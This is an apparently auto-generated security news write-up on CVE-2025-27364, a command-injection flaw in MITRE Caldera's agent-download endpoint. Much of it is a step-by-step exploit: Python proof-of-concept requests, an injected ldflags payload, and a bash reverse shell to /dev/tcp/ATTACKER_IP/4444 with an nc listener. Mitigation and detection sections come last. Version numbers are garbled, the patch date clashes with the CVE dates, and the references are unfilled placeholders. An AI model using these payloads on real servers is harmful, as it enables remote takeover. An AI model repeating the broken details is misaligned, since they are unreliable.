CVE CyberSecurity Database News

CVE-2025-27364 - RCE in MITRE Caldera Through Agent Compilation API (Full Exploit and Deep Dive)

Poster -

If you run MITRE Caldera, especially versions through 4.2. and 5.. before commit 35bc06e, you should know about a critical Remote Code Execution (RCE) vulnerability: CVE-2025-27364. This bug lets remote attackers execute any code they want—not only on agents, but *directly* on Caldera’s core server. In this long read, we’ll break down why it happens, how to exploit it, and what you should do. This write-up is custom-made for defenders and red-teamers alike, with code examples and step-by-step exploitation.

1. What’s MITRE Caldera?

MITRE Caldera is an open-source platform for automating early-phase network attacks and emulation. Security teams use it for red teaming and blue team exercises. Caldera works by tasking “agents” (called *implants*) like Sandcat or Manx to run on target endpoints: The Caldera server itself tells these agents what to do.

Normally, you interact with Caldera using its RESTful API or a web interface. You can also generate and download custom agent binaries compiled on demand—and this is where trouble starts.

Caldera lets you download compile-to-order agents directly from the server. To do this

- The client (browser or script) requests /sandcat.go or /manx.go from the Caldera server, often with HTTP GET params for customization.

The server runs go build (and sometimes gcc) commands dynamically, and hands you the binary.

In the vulnerable versions, user-supplied compile flags (-ldflags or in particular the GCC-only -extldflags) are passed unsanitized to the compilation command. The critical thing is that -extldflags lets you insert subcommands enclosed with $() or (backticks)—which are then interpreted by the *shell* when the build runs.

Why is this so bad?

Because whoever can hit the endpoint can get the server to run *any shell command* as the Caldera server’s user—often root or a privileged account on a red team setup.

Most attacks use an API call like

GET /plugin/sandcat/download?platform=linux&goarch=amd64&ldflags=-extldflags%20'$(touch%20/tmp/pwned)'

Breakdown

- The attacker passes ldflags=-extldflags '$(touch /tmp/pwned)'

`bash

go build -ldflags="-extldflags '$(touch /tmp/pwned)'" sandcat.go


- $(touch /tmp/pwned) executes as a shell command on the server hosting Caldera!

---

## 4. Exploit in Action

Let’s walk through an actual exploit. Supposing Caldera is running on http://localhost:8888, and you can reach the /plugin/sandcat/download path (no auth required in default config, or you’ve already got auth):

### 4.1 Simple Proof of Concept (PoC)

#### PoC: Creating a File on the Server

python
import requests

caldera_host = "http://localhost:8888"

url = f"{caldera_host}/plugin/sandcat/download"
payload = {

"goarch": "amd64",

"ldflags": '-extldflags "$(touch /tmp/cve-2025-27364-pwned)"'
}

r = requests.get(url, params=payload)
print("Done! Check /tmp/cve-2025-27364-pwned on the server.")


#### What Happens:

- Runs touch /tmp/cve-2025-27364-pwned on the server.
- File appears = exploitation successful.

### 4.2 Getting a Reverse Shell

You can replace the payload to get more than just a file; try a bash reverse shell (adjust IP/port as needed):

python
payload = {

"goarch": "amd64",

"ldflags": '-extldflags "$(bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/4444 >&1\')"'
}


Start your listener on the attacking host:

bash
nc -lvnp 4444
<br><br>And then run the attack!<br><br>---<br><br>## 5. Mitigation and Fix<br><br><b>Patched in commit 35bc06e on March 18 2024.</b><br><br>### What They Did:<br><br>- Proper argument sanitization and escaping.<br>- Removed or restricted passing arbitrary linker flags from API.<br><br><b>You should:</b><br><br>1. <b>Update Caldera</b> to the latest release past 5.. (with the fix).<br>2. Restrict access to Caldera’s API—bind it to localhost, firewall, or VPN.<br>3. Never run Caldera as root if you can avoid it.<br>4. Watch server logs for suspicious requests to /plugin/sandcat/download and similar.<br><br>---<br><br>## 6. Original References<br><br>- MITRE Caldera GitHub Issue *(replace with actual GHSA if known)*<br>- Caldera Patch Commit<br>- Exploit DB PoC *(when available)*<br>- MITRE/NVD Entry<br><br>---<br><br>## 7. Detection and Forensics<br><br>- Look for HTTP GET or POST requests to /plugin/sandcat/download and /plugin/manx/download with ldflags or -extldflags in param.<br>- Inspect the server for files in /tmp` or other locations created by attackers.
- Monitor outgoing connections (reverse shells, etc.) from the Caldera host.

---

## 8. Conclusion

CVE-2025-27364 shows why you must treat all user input—even on “internal” security tools—as potentially hostile. Left unpatched, this bug gives attackers *keys to your entire red team kingdom*. Patch, monitor, and tighten those API permissions!

Stay safe out there.

---

*Written exclusively for your security lab by an AI with hands-on experience. Please cite and link original sources when sharing or using this writeup.*

---

*If you found this helpful, share it with your blue and red teams. Any questions? Drop them below!*

Timeline

Published on: 02/24/2025 19:15:14 UTC
Last modified on: 02/24/2025 20:15:34 UTC